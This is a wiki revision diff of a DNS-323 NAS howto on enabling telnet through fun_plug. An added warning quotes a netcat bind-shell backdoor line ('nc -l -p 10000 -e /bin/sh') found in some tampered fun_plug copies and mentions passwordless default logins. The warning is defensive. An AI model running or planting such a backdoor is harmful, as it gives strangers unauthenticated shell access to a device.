Differences
This shows you the differences between the selected revision and the current version of the page.
howto:telnet 2009/12/05 19:43 | howto:telnet 2017/09/06 18:38 current | ||
---|---|---|---|
Line 1: | Line 1: | ||
====== Enabling Telnet ====== | ====== Enabling Telnet ====== | ||
Before you even try this, please be :!: **WARNED** :!: that using telnet to your DNS-323 you can very easily [[wp>bricked|brick]] your unit. | Before you even try this, please be :!: **WARNED** :!: that using telnet to your DNS-323 you can very easily [[wp>bricked|brick]] your unit. | ||
+ | |||
+ | |||
Line 6: | Line 8: | ||
An easy way to enable Telnet without modifying your firmware is to install Fonz funplug. (More info [[http://wiki.dns323.info/howto:ffp|here]]). You can rollback your changes (and remove telnet access) later on by simply removing Fonz funplug files and reboot. | An easy way to enable Telnet without modifying your firmware is to install Fonz funplug. (More info [[http://wiki.dns323.info/howto:ffp|here]]). You can rollback your changes (and remove telnet access) later on by simply removing Fonz funplug files and reboot. | ||
- | It is commonly accepted that you can't harm your device this way (you still should know what you do when using telnet) | + | It is commonly accepted that you can't harm your device this way (you still should know what you do when using telnet). |
+ | |||
+ | Be aware that anyone can login with the username "nobody" with no password. Also true using "admin" and no password if you have not set up a password for the admin web page. For best results just use telnet to enable ssh and disable telnet after that. | ||
===== Modified firmware with telnet access ===== | ===== Modified firmware with telnet access ===== | ||
Line 106: | Line 110: | ||
===== Download Telnet ===== | ===== Download Telnet ===== | ||
- | Next step is to dowload the files required. [[http://forum.dsmg600.info/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!: | + | **WARNING** Be careful what you download. Some copies of fun_plug contain backdoors like using nc (netcat) to allow unauthenticated access to port 10000. Running netcat like this may cause the unmount problems described above. |
+ | E.g. | ||
+ | /mnt/HD_a2/nc -l -p 10000 -e /bin/sh & | ||
+ | |||
+ | Next step is to dowload the files required. [[http://dns323.kood.org/forum/profile.php?id=47|KRH]] kindly provided them for us and you can now download them from here: {{:howto:utelnet-kit.tar.gz}}. For Windows Users: :!: Dont use WinZIP - try 7-Zip or WinRAR instead :!: | ||
From this file, extract the following files: | From this file, extract the following files: | ||
Line 112: | Line 120: | ||
* utelnetd | * utelnetd | ||
* busybox3 | * busybox3 | ||
- | |||
===== Installing Telnet ===== | ===== Installing Telnet ===== | ||
- | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files resides on the first disc and in the following structure and that they have rights to //execute//. | + | When all files are extracted you need to install them. This can be achieved in several ways covered in the [[fun_plug]] howto. The most important is that the files reside on the first disc and in the following structure and that they have rights to //execute//. |
<code bash> | <code bash> |